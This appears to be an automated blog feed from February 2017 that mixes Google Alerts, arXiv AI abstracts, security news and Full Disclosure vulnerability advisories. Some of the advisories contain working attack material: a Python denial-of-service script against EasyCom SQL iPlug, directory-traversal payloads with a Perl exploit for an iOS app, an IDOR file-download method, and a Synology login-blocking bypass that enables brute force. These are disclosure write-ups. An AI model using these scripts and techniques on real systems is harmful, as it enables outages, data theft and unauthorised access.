from Google Alert - anonymous http://ift.tt/2lrTqo7
via IFTTT

Search filter box broken for anonymous

Search filter box DOES NOT work for anonymous in user, with JS error: Uncaught ReferenceError: Drupal is not defined at datatables.js?v=1.x:2 at ...

from Google Alert - anonymous http://ift.tt/2metURg
via IFTTT

Clipping from Burlington Gazette Wed, Dec 21, 1927

People in 12/21/1927 Advertisement clipping : W. Haffner.

from Google Alert - anonymous http://ift.tt/2lrTp3x
via IFTTT

Anonymous function repeated calls

Anonymous function repeated calls. JavaScript performance comparison. Revision 2 of this test case created by Ethan 36 minutes ago ...

from Google Alert - anonymous http://ift.tt/2lHKUBA
via IFTTT

Clipped from Cedar Rapids Gazette July 1, 1986

People in 07/01/1986 Obituary Death Notice clipping : John.

from Google Alert - anonymous http://ift.tt/2laNkWn
via IFTTT

An Integer Programming Model for Binary Knapsack Problem with Value-Related Dependencies among Elements. (arXiv:1702.06662v1 [cs.AI])

Binary Knapsack Problem (BKP) is to select a subset of an element (item) set with the highest value while keeping the total weight within the capacity of the knapsack. This paper presents an integer programming model for a variation of BKP where the value of each element may depend on selecting or ignoring other elements. Strengths of such Value-Related Dependencies are assumed to be imprecise and hard to specify. To capture this imprecision, we have proposed modeling value-related dependencies using fuzzy graphs and their algebraic structure.



from cs.AI updates on arXiv.org http://ift.tt/2lxeM1G
via IFTTT

Unsupervised Diverse Colorization via Generative Adversarial Networks. (arXiv:1702.06674v1 [cs.CV])

Colorization of grayscale images has been a hot topic in computer vision. Previous research mainly focuses on producing a colored image to match the original one. However, since many colors share the same gray value, an input grayscale image could be diversely colored while maintaining its reality. In this paper, we design a novel solution for unsupervised diverse colorization. Specifically, we leverage conditional generative adversarial networks to model the distribution of real-world item colors, in which we develop a fully convolutional generator with multi-layer noise to enhance diversity, with multi-layer condition concatenation to maintain reality, and with stride 1 to keep spatial information. With such a novel network architecture, the model yields highly competitive performance on the open LSUN bedroom dataset. The Turing test of 80 humans further indicates our generated color schemes are highly convincible.



from cs.AI updates on arXiv.org http://ift.tt/2lN6Uf1
via IFTTT

Task-driven Visual Saliency and Attention-based Visual Question Answering. (arXiv:1702.06700v1 [cs.CV])

Visual question answering (VQA) has witnessed great progress since May, 2015 as a classic problem unifying visual and textual data into a system. Many enlightening VQA works explore deep into the image and question encodings and fusing methods, of which attention is the most effective and infusive mechanism. Current attention based methods focus on adequate fusion of visual and textual features, but lack the attention to where people focus to ask questions about the image. Traditional attention based methods attach a single value to the feature at each spatial location, which losses many useful information. To remedy these problems, we propose a general method to perform saliency-like pre-selection on overlapped region features by the interrelation of bidirectional LSTM (BiLSTM), and use a novel element-wise multiplication based attention method to capture more competent correlation information between visual and textual features. We conduct experiments on the large-scale COCO-VQA dataset and analyze the effectiveness of our model demonstrated by strong empirical results.



from cs.AI updates on arXiv.org http://ift.tt/2lxbKue
via IFTTT

Causal Inference by Stochastic Complexity. (arXiv:1702.06776v1 [cs.LG])

The algorithmic Markov condition states that the most likely causal direction between two random variables X and Y can be identified as that direction with the lowest Kolmogorov complexity. Due to the halting problem, however, this notion is not computable.

We hence propose to do causal inference by stochastic complexity. That is, we propose to approximate Kolmogorov complexity via the Minimum Description Length (MDL) principle, using a score that is mini-max optimal with regard to the model class under consideration. This means that even in an adversarial setting, such as when the true distribution is not in this class, we still obtain the optimal encoding for the data relative to the class.

We instantiate this framework, which we call CISC, for pairs of univariate discrete variables, using the class of multinomial distributions. Experiments show that CISC is highly accurate on synthetic, benchmark, as well as real-world data, outperforming the state of the art by a margin, and scales extremely well with regard to sample and domain sizes.



from cs.AI updates on arXiv.org http://ift.tt/2kObrhr
via IFTTT

Using Redescription Mining to Relate Clinical and Biological Characteristics of Cognitively Impaired and Alzheimer's Disease Patients. (arXiv:1702.06831v1 [q-bio.QM])

Based on a set of subjects and a collection of descriptors obtained from the Alzheimer's Disease Neuroimaging Initiative database, we use redescription mining to find rules revealing associations between these determinants which provides insights about the Alzheimer's disease (AD). We applied a four-step redescription mining algorithm (CLUS-RM), which has been extended to engender constraint-based redescription mining (CBRM) and enables several modes of targeted exploration of specific, user-defined associations. To a large extent we confirmed known findings, previously reported in the literature. However, several redescriptions contained biological descriptors that differentiated well between the groups and for which connection to AD is still not completely explained. Examples include testosterone, ciliary neurotrophic factor, brain natriuretic peptide, insulin etc. The imaging descriptor Spatial Pattern of Abnormalities for Recognition of Early AD and levels of leptin and angiopoietin-2 in plasma were also found to be remarkably good descriptors, that may provide better understanding of AD pathogenesis. Finally, the most intriguing and novel finding was the high association of the Pregnancy-Associated Protein-A (PAPP-A) with cognitive impairment in AD. The high importance of this finding lies in the fact that PAPP-A is a metalloproteinase, known to cleave insulin-like growth factor binding proteins. Since it also shares similar substrates with A Disintegrin and Metalloproteinase family of enzymes that act as {\alpha}-secretase to physiologically cleave amyloid precursor protein (APP) in the non-amyloidogenic pathway, it could be directly involved in metabolism of APP very early during the disease course. Therefore, further studies should investigate the role of PAPP-A in the development of AD more thoroughly.



from cs.AI updates on arXiv.org http://ift.tt/2lxktga
via IFTTT

Knowledge Graph Completion via Complex Tensor Factorization. (arXiv:1702.06879v1 [cs.AI])

In statistical relational learning, knowledge graph completion deals with automatically understanding the structure of large knowledge graphs---labeled directed graphs---and predicting missing relationships---labeled edges. State-of-the-art embedding models propose different trade-offs between modeling expressiveness, and time and space complexity. We reconcile both expressiveness and complexity through the use of complex-valued embeddings and explore the link between such complex-valued embeddings and unitary diagonalization. We corroborate our approach theoretically and show that all real square matrices---thus all possible relation/adjacency matrices---are the real part of some unitarily diagonalizable matrix. This results opens the door to a lot of other applications of square matrices factorization. Our approach based on complex embeddings is arguably simple, as it only involves a Hermitian dot product, the complex counterpart of the standard dot product between real vectors, whereas other methods resort to more and more complicated composition functions to increase their expressiveness. The proposed complex embeddings are scalable to large data sets as it remains linear in both space and time, while consistently outperforming alternative approaches on standard link prediction benchmarks.



from cs.AI updates on arXiv.org http://ift.tt/2lHweTn
via IFTTT

Solving DCOPs with Distributed Large Neighborhood Search. (arXiv:1702.06915v1 [cs.AI])

The field of Distributed Constraint Optimization has gained momentum in recent years, thanks to its ability to address various applications related to multi-agent cooperation. Nevertheless, solving Distributed Constraint Optimization Problems (DCOPs) optimally is NP-hard. Therefore, in large-scale, complex applications, incomplete DCOP algorithms are necessary. Current incomplete DCOP algorithms suffer of one or more of the following limitations: they (a) find local minima without providing quality guarantees; (b) provide loose quality assessment; or (c) are unable to benefit from the structure of the problem, such as domain-dependent knowledge and hard constraints. Therefore, capitalizing on strategies from the centralized constraint solving community, we propose a Distributed Large Neighborhood Search (D-LNS) framework to solve DCOPs. The proposed framework (with its novel repair phase) provides guarantees on solution quality, refining upper and lower bounds during the iterative process, and can exploit domain-dependent structures. Our experimental results show that D-LNS outperforms other incomplete DCOP algorithms on both structured and unstructured problem instances.



from cs.AI updates on arXiv.org http://ift.tt/2lMTEHm
via IFTTT

Realization of Ontology Web Search Engine. (arXiv:1702.06934v1 [cs.AI])

This paper describes the realization of the Ontology Web Search Engine. The Ontology Web Search Engine is realizable as independent project and as a part of other projects. The main purpose of this paper is to present the Ontology Web Search Engine realization details as the part of the Semantic Web Expert System and to present the results of the Ontology Web Search Engine functioning. It is expected that the Semantic Web Expert System will be able to process ontologies from the Web, generate rules from these ontologies and develop its knowledge base.



from cs.AI updates on arXiv.org http://ift.tt/2lazd3l
via IFTTT

Recognition of Visually Perceived Compositional Human Actions by Multiple Spatio-Temporal Scales Recurrent Neural Networks. (arXiv:1602.01921v3 [cs.CV] UPDATED)

The current paper proposes a novel neural network model for recognizing visually perceived human actions. The proposed multiple spatio-temporal scales recurrent neural network (MSTRNN) model is derived by introducing multiple timescale recurrent dynamics to the conventional convolutional neural network model. One of the essential characteristics of the MSTRNN is that its architecture imposes both spatial and temporal constraints simultaneously on the neural activity which vary in multiple scales among different layers. As suggested by the principle of the upward and downward causation, it is assumed that the network can develop meaningful structures such as functional hierarchy by taking advantage of such constraints during the course of learning. To evaluate the characteristics of the model, the current study uses three types of human action video dataset consisting of different types of primitive actions and different levels of compositionality on them. The performance of the MSTRNN in testing with these dataset is compared with the ones by other representative deep learning models used in the field. The analysis of the internal representation obtained through the learning with the dataset clarifies what sorts of functional hierarchy can be developed by extracting the essential compositionality underlying the dataset.



from cs.AI updates on arXiv.org http://ift.tt/1PJbylV
via IFTTT

Adversarial Delays in Online Strongly-Convex Optimization. (arXiv:1605.06201v2 [cs.LG] UPDATED)

We consider the problem of strongly-convex online optimization in presence of adversarial delays; in a T-iteration online game, the feedback of the player's query at time t is arbitrarily delayed by an adversary for d_t rounds and delivered before the game ends, at iteration t+d_t-1. Specifically for \algo{online-gradient-descent} algorithm we show it has a simple regret bound of \Oh{\sum_{t=1}^T \log (1+ \frac{d_t}{t})}. This gives a clear and simple bound without resorting any distributional and limiting assumptions on the delays. We further show how this result encompasses and generalizes several of the existing known results in the literature. Specifically it matches the celebrated logarithmic regret \Oh{\log T} when there are no delays (i.e. d_t = 1) and regret bound of \Oh{\tau \log T} for constant delays d_t = \tau.



from cs.AI updates on arXiv.org http://ift.tt/1WJADBm
via IFTTT

Options Discovery with Budgeted Reinforcement Learning. (arXiv:1611.06824v3 [cs.LG] UPDATED)

We consider the problem of learning hierarchical policies for Reinforcement Learning able to discover options, an option corresponding to a sub-policy over a set of primitive actions. Different models have been proposed during the last decade that usually rely on a predefined set of options. We specifically address the problem of automatically discovering options in decision processes. We describe a new learning model called Budgeted Option Neural Network (BONN) able to discover options based on a budgeted learning objective. The BONN model is evaluated on different classical RL problems, demonstrating both quantitative and qualitative interesting results.



from cs.AI updates on arXiv.org http://ift.tt/2fWM0V2
via IFTTT

Anonymous Sharing Links

Does anyone know if there's plans to add anonymous link sharing to Group files? It's one feature that is making it a little more difficult to move.

from Google Alert - anonymous http://ift.tt/2mmFau8
via IFTTT

Revisioning Status Warning Message Displaying to anonymous users

When viewing a page on a site as an anonymous user and the node is published but has revisions it will display the Drupal warning message saying ...

from Google Alert - anonymous http://ift.tt/2kNOjjd
via IFTTT

Anonymous Novels

Look, we all have crappy novels that we've anonymously serialized in some smalltime regional newspaper. (Mine is about a family of panda bears ...

from Google Alert - anonymous http://ift.tt/2lqxSYQ
via IFTTT

11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered

Another privilege-escalation vulnerability has been discovered in Linux kernel that dates back to 2005 and affects major distro of the Linux operating system, including Redhat, Debian, OpenSUSE, and Ubuntu. Over a decade old Linux Kernel bug (CVE-2017-6074) has been discovered by security researcher Andrey Konovalov in the DCCP (Datagram Congestion Control Protocol) implementation using


from The Hacker News http://ift.tt/2lpL4gF
via IFTTT

Orioles Interview: Zach Britton talks about developing his sinker, the team's window to compete; listen now in ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

anonymous

Tinkercad user #anonymous. silence is the most powerful scream do not pretend to us or u will have a little visit.

from Google Alert - anonymous http://ift.tt/2lM7QQP
via IFTTT

PhD - Are anonymised databases truly anonymous?

Details. The Asthma UK Centre for Applied Research (AUKCAR: www.aukcar.ac.uk), based at The University of Edinburgh, is offering one PhD ...

from Google Alert - anonymous http://ift.tt/2mm6qZY
via IFTTT

anonymous snippets

Support anonymous snippets like https://gist.github.com.

from Google Alert - anonymous http://ift.tt/2l8FnAV
via IFTTT

[FD] Teradici Management Console 2.2.0 - Privilege Escalation

# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation # Date: February 22nd, 2017 # Exploit Author: hantwister # Vendor Homepage: http://ift.tt/2lLFyWI # Software Link: http://ift.tt/2lvz7ob (login required) # Version: 2.2.0 Users that can access the Settings > Database Management page can achieve code execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64) Web Shell Upload Vulnerability Overview

Source: Gmail -> IFTTT-> Blogger

[FD] EasyCom SQL iPlug Denial Of Service

[+] Credits: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2kMsi4g [+] ISR: ApparitionSec Vendor: ================ easycom-aura.com Product: =========== SQL iPlug EasycomPHP_4.0029.iC8im2.exe SQL iPlug provides System i applications real-time access to heterogeneous and external databases (Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication. Vulnerability Type: =================== Denial Of Service CVE Reference: ============== CVE-2017-5359 Security Issue: ================ SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via HTTP requests fed to the "D$EVAL" parameter. Exploit/POC: ============ import socket print 'EasyCom SQL-IPLUG DOS 0day!' print 'hyp3rlinx' IP = raw_input("[IP]> ") PORT = 7078 payload="A"*43000 arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n") c+=1 print "doit!" except socket.error: print "[*] 5th ave 12:00" raw_input() break Disclosure Timeline: ====================================== Vendor Notification: December 22, 2016 Vendor acknowledgement: December 23, 2016 Vendor Release Fix/Version February 20, 2017 February 22, 2017 : Public Disclosure Network Access: =============== Remote Severity: =========== Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] EasyCom PHP API Stack Buffer Overflow

[+] Credits: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2kZCn9o [+] ISR: ApparitionSec Vendor: ================ easycom-aura.com Product: =========================== EASYCOM AS400 (iBMI) PHP API EasycomPHP_4.0029.iC8im2.exe EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in Windows, Linux, and IBMi. EasyCom tested here requires older version of PHP. Setup test environment: Windows 7 XAMPP 1.7.3 PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0 PHP compiled module API=20090626 (need to use for EasyCom IBM DLL) Vulnerability Type: ========================= API Stack Buffer Overflow CVE Reference: ============== CVE-2017-5358 Security Issue: ================ EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system. Below I provide some proof of concept details for a few of them. EAX 00000000 ECX 41414141 EDX 771D6ACD ntdll.771D6ACD EBX 00000000 ESP 00C0F238 EBP 00C0F258 ESI 00000000 EDI 00000000 EIP 41414141 C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 1 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) SEH chain of main thread Address SE handler 00C0F354 kernel32.7600410E 00C0FF78 42424242 52525252 *** CORRUPT ENTRY *** WinDbg dump... (720.a70): Access violation - code c0000005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000 eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> !load winext/msec 0:000> !exploitable !exploitable 1.6.0.0 Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411) User mode DEP access violations are exploitable. PHP Crash: ============= Problem signature: Problem Event Name: BEX Application Name: php.exe Application Version: 5.3.1.0 Application Timestamp: 4b06c430 Fault Module Name: StackHash_e98d Fault Module Version: 0.0.0.0 Fault Module Timestamp: 00000000 Exception Offset: 41414141 Exception Code: c0000005 Exception Data: 00000008 OS Version: 6.1.7601.2.1.0.256.48 Exploit/POC: =============== php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park. Network Access: =============== Remote Severity: ========== High Disclosure Timeline: ====================================== Vendor Notification: December 22, 2016 Vendor acknowledgement: December 23, 2016 Vendor Release Fix/Version February 20, 2017 February 22, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Hyp3rlinX

Source: Gmail -> IFTTT-> Blogger

[FD] Synology NAS "Auto Block IP" bypass and hide real IP in Synology logs

Greetings, 1. Seems to be possible bypass the default enabled "Auto Block of IP address" functionality in Synologic's NAS by using only one single space (\x20) to the HTTP header "X-FORWARDED-FOR" (If already Auto Blocked, this bypass will _not_ work) Generates in /var/log/messages: 2017-02-21T20:39:13+02:00 VirtualDSM_8451 login.cgi: login.c:1039 login.c (1039)Bad parameter :'' Bypassing whole function that will Auto Block IP if to many invalid login tries, opens the possibility to brute force without being locked out. 2. (1st Choice) "X-FORWARDED-FOR" and (2nd Choice) "CLIENT-IP" in HTTP header can be used to hide real IP from the Synology logs. Example #1 (rhost): /var/log/auth.log: 2017-02-21T20:42:02+02:00 VirtualDSM_8451 synocgid: pam_unix(webui:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=0.0.0.0 user=admin Example #2 (rhost): /var/log/auth.log: 2017-02-21T20:46:26+02:00 VirtualDSM_8451 synocgid: pam_unix(webui:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=Full Disclosure user=admin Best, bashis

Source: Gmail -> IFTTT-> Blogger

Are anonymised databases truly anonymous?

There are increasing demands from non-commercial funders that clinical trialists should share trial data once the primary analysis is completed.

from Google Alert - anonymous http://ift.tt/2lFJJ5M
via IFTTT

ISS Daily Summary Report – 2/21/2017

Preparation for Dragon Arrival:  Dragon successfully lifted off on the SpaceX Falcon 9 rocket from Launch Pad 39A at Kennedy Space Center, Florida Sunday 19-February at 8:39 am CST.  Today Dragon will continue to phase towards the ISS for a planned capture on Wednesday 22-February at approximately 5:00 am CST.  Onboard the ISS the USOS crew participated in a Dragon cargo transfer conference with ground specialist.  Miniature Exercise Device (MED-2): The crew was unable to locate the one-of-a-kind power cable and stood down from MED-2 technical evaluation operations while ground teams investigated the potential locations. The crew was able to provide input for potential placement of cameras for future MED-2 exercise investigations. The microgravity environment of space weakens muscle and bone, so orbiting crew members spend significant amounts of time exercising. The ISS’s exercise equipment is large and bulky, while the MED-2 aims to demonstrate small robotic actuators can provide motion and resistance for crew workout sessions, reducing the size and weight of exercise equipment for long-duration space missions. The MED-2 investigation is a system to test key technologies needed to develop space based exercise equipment that may provide appropriate countermeasures to the adverse effects of microgravity. This technology is critical for the initial design and development of second and third generation Counter Measure Systems (CMS) hardware that is an order of magnitude lighter and smaller than existing ISS class of CMS hardware and that has significantly greater reliability. Radio Frequency Identification (RFID) Tag Installation and Calibration: Last week the crew installed the RFID antennas around the hatchways of the US Lab, Node 1 and Node 2, which are continuously scanning to measure the RFID tags that are transported through the hatchways and modules.  Today the crew installed 16 marker tags in each the US Lab, Node 1 and Node 2 in a roughly uniform distribution throughout the module.  The crew then performed a calibration by attaching an RFID tag to a video camera.  They then translated through the three modules at different rates of speed.  Ground teams will then take the time-tagged video data and RFID collected data to calibrate the antennas. The RFID Logistics experiment aims to utilize RFID enabled tags on hardware throughout the ISS, and assist in the tracking of the hardware as it is moved around the station.   Combustion Integration Rack (CIR) Camera Cover Removal: The crew translated and rotated the CIR Optics Bench in order to access the Intensified Camera Package. They uninstalled the camera at Universal Mounting Location-2 (UML-2) at the back of the Optics Bench and removed the CIR Soft Window cover. The Intensified Camera Package was reinstalled and Optics Bench rotated back into position. During a ground checkout on February 10, teams were unable to complete a calibration of the camera packages for the Cool Flames Experiment.  After investigation by ground specialists it was determined that the Window Cover was still attached. Teams will resume checkout and calibration activities of thee CIR for the Cool Flames experiment following today’s completed activities.  The Cool Flames Investigation will provide new insight into the phenomenon where some types of fuels initially burn very hot, then appear to go out — but they continue burning at a much lower temperature, with no visible flames (cool flames). Understanding cool flame combustion helps scientists develop new engines and fuels that are more efficient and less harmful to the environment. Microgravity Science Laboratory (MSL) Sample Cartridge Assembly (SCA) Exchange: The crew changed out the SCA in the Solidification Quenching Furnace (SQF), removing the calibration cartridge and inserting the first test sample. Ground teams will initiate the runs next week. The Batch-2b of the Materials Science Laboratory Sample Cartridge Assemblies serves two projects investigating how different phases organize in a structure when metallic alloys are solidified. The project Metastable Solidification of Composites (METCOMP) studies the phase formed by the reaction of the remaining liquid phase with an already formed solid, to form a second solid phase on cooling. For this purpose, Bronze (Copper-Tin Alloys) of different compositions will be processed. The other project, Solidification along a Eutectic path in Ternary Alloys (SETA), looks at how two phases that form together organize into lamellar, or fiber, structures when cooling Aluminum (Copper-Silver Alloys). Both projects will provide benchmark samples that will enable to test numerical models that aim to predict these structures.  Lighting Effects Vision Test: The crew performed a Visual Performance Test in which they configured the Solid State Lighting Assembly (SSLA) in their Crew Quarters (CQ) to the correct mode, turning off all other light sources, then performed one Numerical Verification Test and one Color Discrimination Test. The Lighting Effects investigation studies the impact of the change from fluorescent light bulbs to solid-state light-emitting diodes (LEDs) with adjustable intensity and color and aims to determine if the new lights can improve crew circadian rhythms, sleep, and cognitive performance. Microscope Setup: In support of the Microgravity Expanded Stem Cells (MESC) payload to be delivered by SpX-10 the crew configured a microscope outside the Microgravity Science Glovebox (MSG). MESC will aid researches determine the efficiency of using a microgravity environment to accelerate expansion (replication) of stem cells for use in terrestrial clinical trials for treatment of disease. Haptics-2: During today’s Haptics-2 experiment the 1-Degree of Freedom (1-DOF) joystick failed.  No resistance was felt when moving the handle without pressing the yellow activation button. When the crew pressed the activation button and moved the joystick an off-nominal mechanical/electrical sound was heard, suggesting a possible mechanical failure. Teams decided to stand down for operations and downlink the log files to investigate the issue. Haptics-2 is a technology demonstration experiment aimed at validating control interactions to take place between space and ground. In particular, this experiment allows for an astronaut crew in space to control, in real-time, robotic assets on Earth, using force feedback. The operational experience gained from Haptics-2 could be vital for future exploration missions beyond Earth orbit, where astronauts would be able to control robotic assets to maximize scientific operations […]

from ISS On-Orbit Status Report http://ift.tt/2luVWZ2
via IFTTT

[FD] ProjectSend r754 - IDOR & Authentication Bypass Vulnerability

Document Title: =============== ProjectSend r754 - IDOR & Authentication Bypass Vulnerability References (Source): ==================== http://ift.tt/2kGNA3u Release Date: ============= 2017-02-21 Vulnerability Laboratory ID (VL-ID): ==================================== 2031 Common Vulnerability Scoring System: ==================================== 5.3 Product & Service Introduction: =============================== ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending on external services or e-mail to send those files. (Copy of the Homepage: http://ift.tt/1eNhd58 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application. Vulnerability Disclosure Timeline: ================================== 2017-02-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== GNU GPL License Product: ProjectSend r754 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point to other client account names, which allows an attackers to download others clients private data with no secure method provided. Vulnerability Method(s): [+] GET Vulnerable Module(s): [+] process.php?do=zip_download Vulnerable Parameter(s): [+] client [+] file Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ... 2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension

Source: Gmail -> IFTTT-> Blogger

[FD] Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability

Document Title: =============== Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability References (Source): ==================== http://ift.tt/2m7jEKy Release Date: ============= 2017-02-21 Vulnerability Laboratory ID (VL-ID): ==================================== 2032 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do more things in one app and manage your life better! (Copy of the Homepage: http://ift.tt/2kZaOwU ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application. Vulnerability Disclosure Timeline: ================================== 2017-02-21: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Galaxy Studio (Mo Wellin) Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application. The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters. The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application. The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol. The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access. Request Method(s): [+] GET Vulnerable Module(s): [+] PRE Vulnerable Parameter(s): [+] form action Affected Module(s): [+] Web-Server File System Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Standard Request: http://localhost:5555/?PRE=action form PoC: Payload //..//..//..//..//..//..//..//..//%00 /../../../../../../../../%00 PoC: Exploitation http://localhost:5555/?PRE=action form=/../../../../../../../../%00 PoC: Exploit use strict; use LWP::UserAgent; my $b = LWP::UserAgent->new(); my $host = "localhost:5555"; print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;

Source: Gmail -> IFTTT-> Blogger

Allow anonymous posting by group

Currently, the only way to restrict which users can post anonymously is by trust level. Would it be possible to add group membership as a criterion?

from Google Alert - anonymous http://ift.tt/2locbbJ
via IFTTT

Beware! Don't Fall For "Font Wasn't Found" Google Chrome Malware Scam

Next time when you accidentally or curiously land up on a website with jumbled content prompting you to download a missing font to read the blog by updating the Chrome font pack… …Just Don't Download and Install It. It's a Trap! Scammers and hackers are targeting Google Chrome users with this new hacking scam that's incredibly easy to fall for, prompting users to download a fake Google Chrome


from The Hacker News http://ift.tt/2m7diyo
via IFTTT

[InsideNothing] hitebook.net liked your post "[FD] Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability"



Source: Gmail -> IFTTT-> Blogger

Microsoft releases update for Flash Player, but leaves two disclosed Flaws Unpatched

Microsoft on Tuesday released security update (KB 4010250) to patch flaws in Adobe Flash Player for its customers using Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched. Just last week, Microsoft announced that its February patches would be delayed until March due to a last minute issue, a move that led to Google


from The Hacker News http://ift.tt/2lKBtSs
via IFTTT

I have a new follower on Twitter


BERNICE WILLIS
Feminist, Philanthropist, Hopeless Romantic, Idea Diva, Replacement President of a Major Soft Drink Manufacturer. I draw on fogged up windows.
Manassas, VA

Following: 2590 - Followers: 329

February 22, 2017 at 12:19AM via Twitter http://twitter.com/bernicewillis27

Tuesday, February 21, 2017

[FD] [SYSS-2016-117] ABUS Secvest (FUAA50000) - Missing Protection against Replay Attacks

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Survey of Reasoning using Neural networks. (arXiv:1702.06186v1 [cs.LG])

